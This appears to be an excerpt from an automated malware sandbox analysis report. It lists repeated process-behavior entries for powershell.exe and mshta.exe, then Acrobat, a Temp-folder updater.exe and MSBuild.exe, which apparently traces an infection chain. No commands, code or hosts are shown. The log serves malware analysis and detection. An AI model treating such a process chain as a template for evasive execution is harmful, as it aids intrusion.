Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\27589682\updater.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
